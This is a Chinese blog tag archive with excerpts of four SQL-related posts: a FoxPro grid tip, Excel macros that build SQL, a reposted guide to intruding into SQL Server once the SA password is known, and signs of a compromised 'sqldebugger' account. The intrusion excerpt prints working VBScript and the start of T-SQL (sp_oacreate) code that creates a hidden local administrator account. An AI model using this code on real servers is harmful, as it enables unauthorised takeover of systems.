存档

文章标签 ‘sql’

foxpro如何用代码选中grid行

2012年5月11日
foxpro如何用代码选中grid行已关闭评论

form.init events code: thisform.grid1.ActivateCell(2,1) &&显示第二行第1例 thisform.text1.value=tablename.字段1 &&第一列的字段值

more...

软件技巧 ,

Excel使用VB宏生成SQL语句

2011年8月18日
Excel使用VB宏生成SQL语句已关闭评论

有时候需要将Excel文件中的数据导入到数据库中,常用的做法是使用程序读取Excel,然后存入数据库;这里换一个方法,用Excel生成SQL语句,然后用这些SQL语句来更新数据库。 本文主要说明Excel如何使用VB宏构造需要的SQL语句,并生成文件。 1、先看看生成SQL的界面:   2、如何添加按钮: 依次打开:视图–工具栏–控件工具箱,选择“命令按钮”,自己画一个就行了; 依次打开:右键–属性,可以修改名称、样式等。 具体操作可以上网找找。   3、如何使用VB宏: 依次打开:工具–宏–安全性,看看你的Excel是否允许使用“宏”。 然后打开:工具–宏–Visual Basic 编辑器,双击左侧的“Sheet1”,然后在右侧的代码区域粘贴如下代码:   ‘最大行数 Const MAX_NUM_ROW = 5000   ‘导出文件路径所在单元格 Const PATH_OUTPUT_ROW = 3 Const PATH_OUTPUT_COL = 3   ‘定义列常量 Const NAME_COL = 1 Const GENDER_COL = 2 Const PHONE_COL = 3 Const EMAIL_COL = 4   ‘读取数据开始行数 Const START_ROW = 5   ‘定义数据实体类 Private Type Tmplt NAME As String GENDER As String PHONE As String EMAIL As String End Type   ‘行数变量 Dim noOfTmplts As Integer   ‘数据实体类数组 Dim TmpltArray(MAX_NUM_ROW) As Tmplt   ‘点击按钮触发事件 Private Sub CommandButton1_Click() g

more...

软件技巧 , ,

Microsoft SQL Server SA权限最新入侵方法(转)

2010年4月28日
Microsoft SQL Server SA权限最新入侵方法(转)已关闭评论

Microsoft SQL Server SA权限服务器一直是黑客青睐的对象,笔者在51CTO网站也曾经发表过三篇相关的攻防文章(SA弱口令带来的安全隐患,Microsoft SQL Server SA弱口令攻防实战,SQL Server SA空口令的渗透测试日记),本文再向大家介绍几种入侵方法,读者可以根据情况找出防范办法。 在获得SA密码后,往往因为服务器管理者或”前人”将net.exe和net1.exe被限制使用,无法添加管理员账号。我们知道VBS在活动目录(ADSI)部分有一个winnt对象,用来管理本地资源,利用它可以不依靠CMD等命令就能添加一个管理员,具体代码如下: set wsnetwork=CreateObject(“WSCRIPT.NETWORK”) os=”WinNT://”&wsnetwork.ComputerName Set ob=GetObject(os) ‘得到adsi接口,绑定 Set oe=GetObject(os&”/Administrators,group”) ‘属性,admin组 Set od=ob.Create(“user”,”test”) ‘建立用户 od.SetPassword “1234” ‘设置密码 od.SetInfo ‘保存 Set of=GetObject(os&”/test”,user) ‘得到用户 oe.add os&”/test” 将上面的代码保存为1.vbs,然后执行,命令为“cscript 1.vbs”,这样就会在系统添加一个系统名为test,密码为1234的用户。具体在查询分析器执行的代码如下: declare @o int, @f int, @t int, @ret int exec sp_oacreate ‘scripting.filesystemobject’, @o out ex

more...

软件技巧

关于sqldebugger和TsInternetUser系统用户

2010年4月28日
关于sqldebugger和TsInternetUser系统用户已关闭评论

经常看到网友在网上发帖问sqldebugger、TsInternetUser这个两个用户究竟是什么,是否是正常的系统用户,我觉得不少情况下这个用户都被人利用了,也就是说你可能已经被人入侵了。 TsInternetUser这个用户资料很少,我也没怎么接触过,不知道是怎么生成的,这里主要介绍sqldebugger这个系统用户。安装完sqlserver后,确实可能创建一个sqldebugger用户,如果你没有装sqlserver,系统突然出现这个用户,那一般是被黑了,因为系统出现莫名其妙的用户后,我们会利用搜索引擎查一下,但搜索引擎会告诉我们这个用户确实可能存在,下面有两个方法鉴别这个用户是否已经别人利用了: 1、查看sqldebugger用户,属于哪个组,正常情况下应该属于users组,如图1所示,如果入侵者用这个用户登录你的系统,他要把这个用户放到administrators这个组中,也有可能放到Remote Desktop Users这个组中: 图1 2、C:\Documents and Settings目录下不应该有以sqldebugger为文件名的文件夹,如果有,说明很可能有人利用这个用户远程登录你的系统了。 www.cnking.org/post/353.html

more...

软件技巧